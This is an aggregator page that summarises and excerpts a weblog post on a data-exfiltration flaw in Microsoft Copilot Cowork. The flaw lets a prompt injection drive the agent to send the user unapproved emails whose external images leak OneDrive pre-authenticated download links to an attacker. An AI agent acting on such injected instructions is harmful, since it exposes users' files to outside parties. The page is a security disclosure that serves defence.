Microsoft Copilot Cowork Exfiltrates Files
Microsoft Copilot Cowork has been found to have vulnerabilities that could allow data exfiltration. The system permits agents to send emails to users' inboxes, which can be exploited to leak sensitive information. This issue arises from the ability of these emails to include external images that trigger network requests, potentially exposing user data.
- ▪Microsoft Copilot Cowork allows agents to send emails to users' inboxes without approval.
- ▪Compromised messages can leak data through external images that trigger network requests.
- ▪OneDrive's pre-authenticated download links can be exploited through successful prompt injections.
Opening excerpt (first ~120 words) tap to expand
Microsoft Copilot Cowork Exfiltrates Files (via) The biggest challenge in designing agentic systems continues to be preventing them from enabling attackers to exfiltrate data. In this case Microsoft Copilot Cowork (yes, that's a real product name) was allowing agents to send emails to the user's own inbox without approval... but those messages were then rendered in a way that could leak data to an attacker via rendered images: Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent. Since OneDrive can create pre-authenticated download links, a successful prompt injection could cause those links to be leaked, allowing files to be downloaded by the attacker.
Excerpt limited to ~120 words for fair-use compliance. The full article is at Simon Willison's Weblog.
Discussion
0 commentsMore from Simon Willison's Weblog
